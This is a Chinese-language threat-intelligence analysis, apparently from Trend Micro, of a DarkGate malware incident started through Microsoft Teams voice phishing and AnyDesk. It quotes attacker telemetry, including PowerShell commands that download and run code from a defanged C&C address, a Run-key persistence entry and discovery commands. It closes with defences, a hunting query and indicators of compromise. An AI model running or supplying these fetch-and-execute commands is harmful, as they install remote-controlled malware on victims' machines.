通过Microsoft Teams语音钓鱼传播DarkGate恶意软件的技术分析

摘要

趋势科技托管检测与响应（MDR）团队分析了一起安全事件，攻击者通过Microsoft Teams通话进行社会工程攻击，冒充用户客户并获取其系统远程访问权限。攻击者未能安装Microsoft Remote Support应用程序，但成功诱导受害者下载了常用于远程访问的工具AnyDesk。

获得机器访问权限后，攻击者投放了多个可疑文件，其中一个被检测为Trojan.AutoIt.DARKGATE.D。Autoit3.exe执行的一系列命令导致连接到潜在的命令与控制（C&C）服务器，并随后下载了恶意负载。在数据外泄发生前，攻击被成功阻止。

攻击时间线

初始访问

攻击者使用社会工程手段操纵受害者，以获得对计算机系统的访问和控制权。受害者报告称，她首先收到了数千封电子邮件，随后通过Microsoft Teams接到自称是外部供应商员工的来电。在通话中，受害者被指示下载Microsoft Remote Support应用程序，但通过Microsoft Store的安装失败。攻击者随后指示受害者通过浏览器下载AnyDesk，并操纵用户输入其凭据。

执行

下载AnyDesk.exe后立即观察到其执行，命令如下：

1

"C:\Users\<user>\Downloads\AnyDesk.exe" --local-service

此命令运行AnyDesk远程桌面应用程序，并将其作为本地服务启动，允许以提升的权限或最小化/自动化方式运行。

几分钟后，cmd.exe被调用以执行rundll32.exe加载SafeStore.dll，推测是通过AnyDesk.exe投放的。

1
2
3
4


processCmd: "C:\Windows\System32\cmd.exe"
eventSubId: 2 - TELEMETRY_PROCESS_CREATE
objectFilePath: c:\windows\system32\rundll32.exe
objectCmd: rundll32.exe SafeStore.dll,epaas_request_clone

DLL侧加载技术

趋势科技Vision One的根因分析（RCA）显示了一种DLL侧加载技术，其中rundll32.exe被调用以执行SafeStore.dll中的导出函数epaas_request_clone。该DLL导出了多个可用于执行恶意软件的函数。

执行名为epaas_client.dll的SafeStore.dll会提示输入凭据的登录表单。即使未输入任何凭据，多个恶意命令仍在后台运行，包括：

cmd /c systeminfo：提供系统配置的详细信息。
cmd /c route print：提供当前网络路由表。
cmd /c ipconfig /all：提供所有网络接口的详细信息。

收集的数据保存到123.txt，可能用于系统发现。

DarkGate A3x脚本

可执行文件SystemCert.exe（SHA256: 4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1）被执行，并在C:\Temp\test\文件夹中创建了script.a3x和Autoit3.exe。

创建script.a3x和AutoIt3.exe文件后，通过以下命令执行恶意脚本script.a3x：

1

cmd c:\temp\test\AutoIt3.exe c:\temp\test\script.a3x

加密的AutoIt负载script.a3x在内存中解密为shellcode，并注入到远程进程中。一个观察到的例子是合法的MicrosoftEdgeUpdateCore.exe二进制文件，位于C:\Program Files (x86)\Microsoft\EdgeUpdate。此进程用作代理，将DarkGate脚本加载到内存中执行。执行流随后加载其他类型的恶意软件以进行后续攻击阶段。

发现

Autoit3.exe执行了以下发现命令：

1
2


processCmd: "c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x
objectCmd: "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\fcdcdfc\kcbbbbc

此命令检索系统域信息并将输出保存到C:\ProgramData\fcdcdfc文件夹中的kcbbbbc文件。

防御规避

攻击的复制场景显示，Autoit3.exe正在寻找多个知名防病毒产品。还观察到在不同位置创建了多个随机命名的文件以及Autoit3.exe的副本，此技术用于规避检测。

命令与控制

Autoit3.exe还执行script.a3x将进程注入MicrosoftEdgeUpdateCore.exe，随后观察到连接到外部IP 179.60.149[.]194:80，一个C&C服务器。

1
2
3


processCmd: "c:\temp\test\Autoit3.exe" c:\temp\test\script.a3x
eventSubId: 2 - TELEMETRY_PROCESS_CREATE
objectFilePath: C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.35\MicrosoftEdgeUpdateCore.exe

连接到IP 179.60.149[.]194几分钟后，通过cscript.exe执行了VBScript：

1

objectCmd:cscript spamfilter_v1.4331.vbs

根据VBScript spamfilter_v1.4331.vbs文件的内容，它将运行PowerShell命令，然后通过Autoit3.exe运行script.a3x。

最终DarkGate负载

该事件伴随着执行PowerShell命令，投放DarkGate负载：

1

objectCmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri hxxp://179.60.149[.]194:8080/fdgjsdmt)

上述命令将尝试从hxxp://179.60.149[.]194:8080下载fdgjsdmt，并执行以下内容：

1

objectRawDataStr:ni 'C:/rbne/dxqu/' -Type Directory -Force;cd 'C:/rbne/dxqu/';Invoke-WebRequest -Uri "hxxp://179.60.149[.]194:8080/dogjaafa" -OutFile 'file.zip';Expand-Archive -Path 'file.zip' -DestinationPath 'C:/rbne/dxqu/';

此命令将在C:\rbne\dxqu\创建目录（如果不存在）。-Force标志强制创建，即使目录已存在或具有隐藏或系统属性。然后尝试下载文件（dogjaafa）并保存为file.zip。Expand-Archive是一个PowerShell cmdlet，用于提取zip文件的内容。此命令将下载的file.zip内容提取到C:\rbne\dxqu\目录。file.zip被投放到C:\rbne\dxqu\，包含恶意的AutoIt脚本。

几分钟后，可执行文件StaticSrv.exe（SHA256: faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b）在C:\Users<user>\文件夹中被执行，并调用AutoIt3.exe运行script.a3x。StaticSrv.exe和SystemCert.exe表现出相同的行为。

安装后活动

随后创建了多个文件和注册表项以实现持久化：

C:\ProgramData\fcdcdfc\gdhfdfd\18-11-2024.log（加密键日志）
C:\ProgramData\fcdcdfc\kkfafef
C:\Temp\gggahbb
C:\Temp\hbakdef

Autoit3.exe还创建了以下文件，包括其自身的副本，可能用于备份目的：

C:\ProgramData\fcdcdfc\Autoit3.exe
C:\ProgramData\fcdcdfc\bbbckdb.a3x
C:\Temp\cdcecgg
C:\Users<user>\AppData\Roaming\EaDeKFb

MicrosoftEdgeUpdateCore.exe创建的注册表项如下：

1
2
3
4
5


Registry root:2
Registry key:HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Registry value name:ddadcae
Registry value data: "C:\ProgramData\fcdcdfc\Autoit3.exe" C:\ProgramData\fcdcdfc\bbbckdb.a3x
Registry value type:1

结论与安全建议

在本案例中，攻击在攻击者达到目标前被阻止。未发现与外泄相关的活动。DarkGate主要通过网络钓鱼电子邮件、恶意广告和SEO中毒传播。然而，在此案例中，攻击者利用语音钓鱼（vishing）诱导受害者。微软也记录了使用QuickAssist获取访问权限以分发勒索软件的vishing技术。

为保护自己免受此类攻击，组织可以应用以下最佳实践：

彻底审查第三方技术支持提供商。虽然存在合法的第三方技术支持服务，但组织应在授予对企业系统的远程访问权限前直接验证任何供应商关联声明。应建立云审查流程，通过评估其安全合规性和供应商声誉来评估和批准远程访问工具（如AnyDesk）。
白名单批准的远程访问工具并阻止任何未经验证的应用程序。组织应在远程访问工具上集成多因素认证（MFA），通过要求多种验证形式添加额外保护层。这降低了恶意工具用于获取内部机器控制权的风险。
提供员工培训，提高对社会工程策略、网络钓鱼尝试以及未经请求的支持电话或弹出窗口危险的认识。知情员工更不容易成为社会工程攻击的受害者，从而加强组织的整体安全态势。

为有效应对不断演变的威胁 landscape，组织必须优先考虑分层安全方法。像趋势科技Apex One™ with XDR这样的解决方案提供完整的安全即服务（SaaS）解决方案，提供对趋势科技Vision One™中XDR功能的完全访问，以检测、响应和增强网络攻击的预防。此外，趋势科技™ Managed XDR（包含在趋势科技Service One™中）通过提供全天候监控、防御和检测，确保对新兴威胁的持续保护。

威胁狩猎查询

趋势科技Vision One搜索应用程序要狩猎可能与DarkGate相关的恶意活动，您可以使用以下查询。以下威胁狩猎查询检测正在创建和执行的Autoit3和脚本文件（.a3x）的存在。请注意，这也可能由正常活动触发。

1
2
3
4


eventSubId: 101 - TELEMETRY_FILE_CREATE
eventSubId: 2 - TELEMETRY_PROCESS_CREATE

eventSubId:101 andeventSubId:2 and (objectCmd:(Autoit3.exe or *.a3x) or processCmd:(Autoit3.exe or *.a3x))

更多狩猎查询可用于已启用威胁洞察权限的Vision One客户。

危害指标（IOCs）

SHA256

指标	检测
1cbda9a3f202e7aacc57bcf3d43ec7b1ca42564a947d6b5a778df90cddef079a	SafeStore.dll
4e291266399bd8db27da0f0913c041134657f3b1cf45f340263444c050ed3ee1	SystemCert.exe
faa54f7152775fa6ccaecc2fe4a6696e5b984dfa41db9a622e4d3e0f59c82d8b	StaticSrv.exe
bb56354cdb241de0051b7bcc7e68099e19cc2f26256af66fad69e3d2bc8a8922	script.a3x
e4d13af4bfc3effe4f515c2530b1b182e18ad0c0a3dacac4dd80d6edcf0b007a	spamfilter_v1.4331.vbs

URL/IP

指标	评级	类别
179.60.149.194	Dangerous	C&C Server
hxxp://179[.]60[.]149[.]194:8080/fdgjsdmt	Dangerous	Malware Accomplice